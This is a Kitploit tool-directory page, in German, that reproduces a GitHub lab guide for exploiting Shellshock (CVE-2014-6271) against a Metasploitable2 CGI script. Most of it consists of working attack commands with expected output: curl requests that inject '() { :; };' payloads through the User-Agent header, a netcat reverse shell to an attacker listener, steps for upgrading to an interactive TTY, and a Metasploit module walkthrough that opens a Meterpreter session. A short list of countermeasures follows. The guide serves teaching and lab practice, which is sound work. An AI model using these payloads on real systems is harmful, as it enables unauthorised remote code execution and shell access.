Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271-Shellshock- — Ein vollständiges, modernes Demonstrationslabor für CVE-2014-6271 (Shellshock), einschließlich Architektur, Exploitationsschritten, Nutzung von Burp Suite, Reverse Shells, Gegenmaßnahmen und einer vollständigen Befehls-Cheat-Sheet. | Kitploit
Tools/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
SchwachstellenanalyseExploitationReverse EngineeringWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Payload-Entwicklung
Labs & Praxis
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

Ein vollständiges, modernes Demonstrationslabor für CVE-2014-6271 (Shellshock), einschließlich Architektur, Exploitationsschritten, Nutzung von Burp Suite, Reverse Shells, Gegenmaßnahmen und einer vollständigen Befehls-Cheat-Sheet.

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Ausnutzen von Shellshock (CVE-2014-6271): Ein vollständiges, modernes Demonstrationslabor

Shellshock (CVE-2014-6271) ist eine der einflussreichsten Schwachstellen für Remote-Codeausführung, die je entdeckt wurden. Der Fehler betrifft Bash und ermöglicht es Angreifern, beliebige Befehle auszuführen, indem sie einfach manipulierte Payloads in Umgebungsvariablen injizieren.

Diese Anleitung bietet eine vollständige, reproduzierbare Demonstration mit:

  • Kali Linux (Angreifer)
  • Metasploitable2 (Ziel)
  • curl, Burp Suite, Netcat
  • Einem manuell erstellten Bash-basierten CGI-Skript

Sie ist für Lehre, Forschung, Schulung und allgemeines Cybersicherheitsbewusstsein konzipiert.


📌 Inhaltsverzeichnis

  1. Laborarchitektur
  2. Erstellen des angreifbaren CGI-Skripts
  3. Die Shellshock-Schwachstelle verstehen
  4. Shellshock mit curl ausnutzen
  5. Shellshock mit Burp Suite ausnutzen
  6. Reverse Shell über Shellshock
  7. Upgrade auf ein voll interaktives TTY
  8. Diagramm der Angriffskette
  9. Screenshot-Galerie
  10. Gegenmaßnahmen
  11. Spickzettel (Alle Befehle)
  12. Shellshock mit Metasploit ausnutzen
  13. Fazit

1. Laborarchitektur

Dieses einfache Zwei-Knoten-Setup spiegelt viele Legacy-Bereitstellungen wider, die noch immer in industriellen und IoT-Systemen vorhanden sind.


2. Erstellen des angreifbaren CGI-Skripts

Auf Metasploitable2:

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Teste das Skript von Kali aus:

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

Du solltest die Umgebungsvariablen angezeigt sehen.


3. Die Shellshock-Schwachstelle verstehen

Shellshock tritt auf, wenn Bash Umgebungsvariablen, die wie Funktionsdefinitionen aussehen, fehlerhaft parst.

Eine bösartige Variable wie zum Beispiel:

root@kitploit:~
() { :; }; /bin/bash -c "id"

bewirkt, dass Bash den Befehl nach der Funktionsdefinition ausführt — obwohl die Funktion selbst nie aufgerufen wird.

CGI-Anwendungen sind besonders anfällig, weil HTTP-Header automatisch als Umgebungsvariablen an Skripte übergeben werden.


4. Shellshock mit curl ausnutzen

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Die Ausgabe sollte Folgendes enthalten:

root@kitploit:~
Vulnerable
uid=33(www-data)

Dies bestätigt Remote-Codeausführung.


5. Shellshock mit Burp Suite ausnutzen

5.1 Normale Anfrage senden

Besuche:

root@kitploit:~
http://192.168.1.5/cgi-bin/shellshock.sh

Sende die Anfrage an Repeater.

5.2 Shellshock-Payload injizieren

Ersetze den User-Agent-Header durch:

root@kitploit:~
User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Antwort

Du solltest Folgendes sehen:

root@kitploit:~
BurpTest
uid=33(www-data)

Burp Suite bestätigt die Schwachstelle auf visuelle und lehrreiche Weise.


6. Reverse Shell über Shellshock

Starte den Listener auf Kali:

root@kitploit:~
nc -lvnp 4444

Löse die Reverse Shell über das CGI-Skript aus:

root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Eine Shell wird sich zurück zu Kali verbinden.


7. Upgrade auf ein voll interaktives TTY

Innerhalb der Reverse Shell:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Unterbreche die Sitzung:

root@kitploit:~
Ctrl + Z

Auf Kali:

root@kitploit:~
stty raw -echo; fg

Drücke Enter.

Du hast jetzt:

  • Tab-Vervollständigung
  • Pfeiltasten
  • Jobkontrolle
  • voll interaktive Bash

8. Diagramm der Angriffskette

root@kitploit:~
          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. Screenshot-Galerie

Eine visuelle Darstellung der wichtigsten Phasen des Angriffs.

BeschreibungBild

10. Gegenmaßnahmen

✔ 1. Bash aktualisieren

Patche auf eine Version, die das Parsen von Funktionen korrekt behandelt.

✔ 2. CGI deaktivieren

Legacy-CGI birgt ein unnötiges systemisches Risiko.

✔ 3. HTTP-Header bereinigen

Verwerfe verdächtige Muster wie:

root@kitploit:~
() { :; };

✔ 4. Prinzip der geringsten Rechte anwenden

Schränke die Berechtigungen des Webserver-Benutzers (www-data) ein.

✔ 5. Einschränkungen für ausgehende Verbindungen

Stoppt Reverse Shells und Datenexfiltration.

✔ 6. Eine Web Application Firewall (WAF) einsetzen

Moderne WAF-Signaturen erkennen Shellshock sofort.

✔ 7. SELinux / AppArmor aktivieren

Begrenzt Bash-Prozesse und blockiert unbeabsichtigtes Verhalten.

✔ 8. Regelmäßige Schwachstellenscans durchführen

Verwende Tools wie:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE (http-shellshock.nse)

11. Spickzettel (Alle Befehle)

Ziel-Setup

root@kitploit:~
sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

CGI testen

root@kitploit:~
curl http://192.168.1.5/cgi-bin/shellshock.sh

Shellshock-Test

root@kitploit:~
curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Reverse Shell

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Upgrade auf volles TTY

Innerhalb der Shell:

root@kitploit:~
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Unterbrechen:

root@kitploit:~
Ctrl + Z

Auf Kali:

root@kitploit:~
stty raw -echo; fg

Drücke Enter.


12. Shellshock mit Metasploit ausnutzen (msfconsole)

Metasploit bietet eine professionelle, automatisierte Möglichkeit, Shellshock mit dem integrierten Modul auszunutzen:

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec

Diese Methode ist schnell, zuverlässig und bietet automatisches Payload-Staging (z. B. Meterpreter).


12.1 Metasploit starten

root@kitploit:~
msfconsole

12.2 Nach Shellshock-Modulen suchen

root@kitploit:~
search shellshock

Du solltest (unter anderem) Folgendes sehen:

root@kitploit:~
exploit/multi/http/apache_mod_cgi_bash_env_exec  Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
auxiliary/scanner/http/apache_mod_cgi_bash_env   Apache mod_cgi Bash Environment Variable Injection (Scanner)

12.3 Das Exploit-Modul laden

root@kitploit:~
use exploit/multi/http/apache_mod_cgi_bash_env_exec

12.4 Erforderliche Optionen konfigurieren

Setze die Ziel-IP:

root@kitploit:~
set rhosts 192.168.1.5

Setze den angreifbaren CGI-Pfad:

root@kitploit:~
set targeturi /cgi-bin/shellshock.sh

Setze deine Kali-IP:

root@kitploit:~
set lhost 192.168.1.4

Lege optional den Listening-Port fest:

root@kitploit:~
set lport 4444

Überprüfe:

root@kitploit:~
options

Du solltest Folgendes sehen:

root@kitploit:~
RHOSTS     192.168.1.5
TARGETURI  /cgi-bin/shellshock.sh
LHOST      192.168.1.4
LPORT      4444
METHOD     GET
HEADER     User-Agent
CVE        CVE-2014-6271

12.5 Das Exploit starten

root@kitploit:~
run

Bei Erfolg:

root@kitploit:~
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Command Stager progress - 100.00%
[*] Sending stage ...
[*] Meterpreter session 1 opened ...

12.6 Mit der Meterpreter-Sitzung interagieren

root@kitploit:~
sessions -i 1

Du hast jetzt:

root@kitploit:~
meterpreter >

12.7 Eine normale Shell starten

root@kitploit:~
shell

Dann:

root@kitploit:~
id
hostname

Erwartet:

root@kitploit:~
uid=33(www-data) gid=33(www-data)
metasploitable

Du hast mit Metasploit und Shellshock Remote-Befehlsausführung erlangt.


13. Fazit

Diese Demonstration zeigt, wie Shellshock mithilfe einfacher HTTP-Header-Manipulation, Reverse Shells, CGI-Skriptausführung und Metasploit-Automatisierung ausgenutzt werden kann. Obwohl Shellshock über ein Jahrzehnt alt ist, bleibt es eine wichtige Lektion in:

  • sicheren Softwarepraktiken
  • Eingabebereinigung
  • Risiken von Legacy-Systemen
  • Post-Exploitation-Techniken

Mit viel Liebe gemacht von:
Haitham of Oman ❤️🇴🇲

Tool herunterladen
KomponenteRolleBetriebssystemIP-AdresseWichtige Dienste
Kali LinuxAngreiferKali Linux (neueste Version)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Angreifbarer ZielserverUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI-Skripte, Bash
Apache mod_cgiSkriptausführungLäuft auf MSF2n/aMacht Bash über CGI zugänglich
shellshock.shAngreifbarer EinstiegspunktBash-CGIn/aZeigt Umgebungsvariablen an
Nmap-Scan + Shellshock-Testausgabe
Burp Suite – Erste Shellshock-Anfrage
Burp Suite – Payload-/Header-Injektion
Auf Kali empfangene Reverse Shell (nc)